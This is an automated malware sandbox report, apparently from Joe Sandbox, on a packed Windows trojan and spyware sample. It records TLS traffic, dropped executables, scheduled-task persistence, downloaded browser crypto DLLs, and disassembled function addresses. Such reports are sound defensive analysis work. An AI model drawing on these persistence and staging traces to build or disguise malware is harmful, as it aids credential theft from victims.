                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49988 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50003 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50015 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50028 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50044 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50059 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50061 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.4:50066 version: TLS 1.2

                    System Summary

                    barindex
                    PE file contains section with special chars
                    Source: file.exeStatic PE information: section name:
                    Source: file.exeStatic PE information: section name: .rsrc
                    Source: file.exeStatic PE information: section name: .idata
                    Source: file.exeStatic PE information: section name:
                    Source: DocumentsDGHCBAAEHC.exe.0.drStatic PE information: section name:
                    Source: DocumentsDGHCBAAEHC.exe.0.drStatic PE information: section name: .idata
                    Source: random[1].exe.0.drStatic PE information: section name:
                    Source: random[1].exe.0.drStatic PE information: section name: .idata
                    Source: skotes.exe.9.drStatic PE information: section name:
                    Source: skotes.exe.9.drStatic PE information: section name: .idata
                    Source: random[1].exe.11.drStatic PE information: section name:
                    Source: random[1].exe.11.drStatic PE information: section name: .rsrc
                    Source: random[1].exe.11.drStatic PE information: section name: .idata
                    Source: random[1].exe.11.drStatic PE information: section name:
                    Source: 309de20225.exe.11.drStatic PE information: section name:
                    Source: 309de20225.exe.11.drStatic PE information: section name: .rsrc
                    Source: 309de20225.exe.11.drStatic PE information: section name: .idata
                    Source: 309de20225.exe.11.drStatic PE information: section name:
                    Source: c2bb02869b.exe.11.drStatic PE information: section name:
                    Source: c2bb02869b.exe.11.drStatic PE information: section name: .idata
                    Source: random[1].exe0.11.drStatic PE information: section name:
                    Source: random[1].exe0.11.drStatic PE information: section name: .idata
                    Source: c61fcc859d.exe.11.drStatic PE information: section name:
                    Source: c61fcc859d.exe.11.drStatic PE information: section name: .idata
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C8062C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,0_2_6C8062C0
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C68AC600_2_6C68AC60
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C75AC300_2_6C75AC30
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C746C000_2_6C746C00
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C67ECC00_2_6C67ECC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DECD00_2_6C6DECD0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C74ED700_2_6C74ED70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7AAD500_2_6C7AAD50
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C80CDC00_2_6C80CDC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C808D200_2_6C808D20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C684DB00_2_6C684DB0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C716D900_2_6C716D90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C71EE700_2_6C71EE70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C760E200_2_6C760E20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C68AEC00_2_6C68AEC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C720EC00_2_6C720EC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C706E900_2_6C706E90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C742F700_2_6C742F70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6EEF400_2_6C6EEF40
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7C0F200_2_6C7C0F20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C686F100_2_6C686F10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C75EFF00_2_6C75EFF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C680FE00_2_6C680FE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7C8FB00_2_6C7C8FB0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C68EFB00_2_6C68EFB0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7548400_2_6C754840
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D08200_2_6C6D0820
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C70A8200_2_6C70A820
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7868E00_2_6C7868E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B89600_2_6C6B8960
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D69000_2_6C6D6900
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C79C9E00_2_6C79C9E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B49F00_2_6C6B49F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7409B00_2_6C7409B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7109A00_2_6C7109A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C73A9A00_2_6C73A9A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6FCA700_2_6C6FCA70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C738A300_2_6C738A30
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C72EA000_2_6C72EA00
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6FEA800_2_6C6FEA80
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C786BE00_2_6C786BE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C720BA00_2_6C720BA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6984600_2_6C698460
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C70A4300_2_6C70A430
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E44200_2_6C6E4420
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C71A4D00_2_6C71A4D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6C64D00_2_6C6C64D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7AA4800_2_6C7AA480
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7205700_2_6C720570
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E25600_2_6C6E2560
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7C85500_2_6C7C8550
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D85400_2_6C6D8540
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7845400_2_6C784540
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C70E5F00_2_6C70E5F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C74A5E00_2_6C74A5E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6745B00_2_6C6745B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DC6500_2_6C6DC650
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DE6E00_2_6C6DE6E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C71E6E00_2_6C71E6E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6A46D00_2_6C6A46D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7007000_2_6C700700
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6AA7D00_2_6C6AA7D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6CE0700_2_6C6CE070
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7480100_2_6C748010
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C74C0000_2_6C74C000
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C75C0B00_2_6C75C0B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6900B00_2_6C6900B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6780900_2_6C678090
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E81400_2_6C6E8140
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7641300_2_6C764130
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6F61300_2_6C6F6130
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6801E00_2_6C6801E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7082600_2_6C708260
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7182500_2_6C718250
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C8062C00_2_6C8062C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7582200_2_6C758220
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C74A2100_2_6C74A210
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C74E2B00_2_6C74E2B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7522A00_2_6C7522A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7163700_2_6C716370
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7C23700_2_6C7C2370
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6823700_2_6C682370
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C79C3600_2_6C79C360
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6883400_2_6C688340
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6F23200_2_6C6F2320
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D43E00_2_6C6D43E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B23A00_2_6C6B23A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DE3B00_2_6C6DE3B0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C683C400_2_6C683C40
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7A9C400_2_6C7A9C40
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C691C300_2_6C691C30
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C741CE00_2_6C741CE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7BDCD00_2_6C7BDCD0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C71FC800_2_6C71FC80
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E3D000_2_6C6E3D00
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C751DC00_2_6C751DC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C673D800_2_6C673D80
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7C9D900_2_6C7C9D90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7DBE700_2_6C7DBE70
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C78DE100_2_6C78DE10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6A3EC00_2_6C6A3EC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C805E600_2_6C805E60
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C803FC00_2_6C803FC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B5F200_2_6C6B5F20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C675F300_2_6C675F30
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7D7F200_2_6C7D7F20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C72BFF00_2_6C72BFF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C79DFC00_2_6C79DFC0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6A1F900_2_6C6A1F90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6DD8100_2_6C6DD810
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C75F8F00_2_6C75F8F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C68D8E00_2_6C68D8E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B38E00_2_6C6B38E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7DB8F00_2_6C7DB8F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C71F8C00_2_6C71F8C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6FF9600_2_6C6FF960
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C73D9600_2_6C73D960
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7359200_2_6C735920
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7CF9000_2_6C7CF900
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7179F00_2_6C7179F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E59F00_2_6C6E59F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7199C00_2_6C7199C0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B99D00_2_6C6B99D0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7519900_2_6C751990
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6919800_2_6C691980
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C77DA300_2_6C77DA30
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C721A100_2_6C721A10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6BFA100_2_6C6BFA10
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C681AE00_2_6C681AE0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C75DAB00_2_6C75DAB0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C809A500_2_6C809A50
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C75FB600_2_6C75FB60
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6CBB200_2_6C6CBB20
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6C7BF00_2_6C6C7BF0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C749BB00_2_6C749BB0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D9BA00_2_6C6D9BA0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C765B900_2_6C765B90
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C671B800_2_6C671B80
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C8014A00_2_6C8014A0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7694300_2_6C769430
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C70D4100_2_6C70D410
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6814E00_2_6C6814E0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7CF5100_2_6C7CF510
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E75000_2_6C6E7500
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6955100_2_6C695510
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C7055F00_2_6C7055F0
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6B95900_2_6C6B9590
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D56400_2_6C6D5640
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6996500_2_6C699650
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6A96000_2_6C6A9600
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6F76100_2_6C6F7610
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_00245C839_2_00245C83
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_0024735A9_2_0024735A
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_002888609_2_00288860
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_00244DE09_2_00244DE0
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: 9_2_00244B309_2_00244B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_0033886010_2_00338860
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_0033704910_2_00337049
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_003378BB10_2_003378BB
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_003331A810_2_003331A8
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_002F4B3010_2_002F4B30
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_00332D1010_2_00332D10
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_002F4DE010_2_002F4DE0
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_00327F3610_2_00327F36
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 10_2_0033779B10_2_0033779B
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_0041800012_2_00418000
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_0046D14012_2_0046D140
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_0046AA8012_2_0046AA80
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_0041491212_2_00414912
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_00433A8012_2_00433A80
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_00437CA012_2_00437CA0
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_0043034012_2_00430340
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_0042C7A012_2_0042C7A0
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_0040A0E012_2_0040A0E0
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_00454CA012_2_00454CA0
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_0045B7C012_2_0045B7C0
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_004252C012_2_004252C0
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeCode function: 12_2_004162E012_2_004162E0
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0081F87015_2_0081F870
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0082B2F715_2_0082B2F7
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0082926715_2_00829267
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0086FCD015_2_0086FCD0
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00821C1F15_2_00821C1F
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00851C2015_2_00851C20
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_008385A015_2_008385A0
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0082C34515_2_0082C345
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00825DF915_2_00825DF9
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_008B59F015_2_008B59F0
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00A8B90015_2_00A8B900
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_008B214015_2_008B2140
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_008C514015_2_008C5140
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0085255015_2_00852550
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0082C17715_2_0082C177
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0083DE8015_2_0083DE80
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0082EAB615_2_0082EAB6
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00835ACA15_2_00835ACA
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00A8A2F015_2_00A8A2F0
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_008236E715_2_008236E7
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00A8AED015_2_00A8AED0
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00825DF915_2_00825DF9
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0087EA3015_2_0087EA30
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_008B464015_2_008B4640
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0091424015_2_00914240
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0084067015_2_00840670
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0083038215_2_00830382
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_008CCF8015_2_008CCF80
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0083CBB615_2_0083CBB6
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0083BBDB15_2_0083BBDB
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0084AF0015_2_0084AF00
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0087071015_2_00870710
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_00A89B3015_2_00A89B30
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0083DB2715_2_0083DB27
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0082773C15_2_0082773C
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0082C34515_2_0082C345
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_008D2F5015_2_008D2F50
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_0082773C15_2_0082773C
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeCode function: 15_2_008CC77015_2_008CC770
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C8009D0 appears 338 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C80D930 appears 65 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C7B9F30 appears 52 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C6A3620 appears 95 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C80DAE0 appears 83 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C6A9B10 appears 109 times
                    Source: C:\Users\user\Desktop\file.exeCode function: String function: 6C6DC5E0 appears 35 times
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 003080C0 appears 130 times
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeCode function: String function: 002580C0 appears 130 times
                    Source: C:\Users\user\AppData\Local\Temp\1005561001\crypted.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 320
                    Source: pidgeon.exe.11.drStatic PE information: Number of sections : 11 > 10
                    Source: pidgeon[1].exe.11.drStatic PE information: Number of sections : 11 > 10
                    Source: file.exe, 00000000.00000002.1981589298.000000006F902000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
                    Source: file.exe, 00000000.00000002.1958471071.0000000000A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs file.exe
                    Source: file.exe, 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenamenss3.dll0 vs file.exe
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: file.exeStatic PE information: Section: gcuyxxju ZLIB complexity 0.9948376225490196
                    Source: random[1].exe.11.drStatic PE information: Section: gcuyxxju ZLIB complexity 0.9948376225490196
                    Source: 309de20225.exe.11.drStatic PE information: Section: gcuyxxju ZLIB complexity 0.9948376225490196
                    Source: crypted[1].exe.11.drStatic PE information: Section: .TON ZLIB complexity 1.0003412900086506
                    Source: crypted.exe.11.drStatic PE information: Section: .TON ZLIB complexity 1.0003412900086506
                    Source: pidgeon.exe, 0000000C.00000000.2422072921.0000000000F6D000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: vb.vbpe
                    Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@54/64@34/14
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6E0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,0_2_6C6E0300
                    Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1IH7PS2T.htmJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005565001\c2bb02869b.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1216
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:796:120:WilError_03
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
                    Source: C:\Users\user\DocumentsDGHCBAAEHC.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\AppData\Local\Temp\1005552001\pidgeon.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: softokn3[1].dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3[1].dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
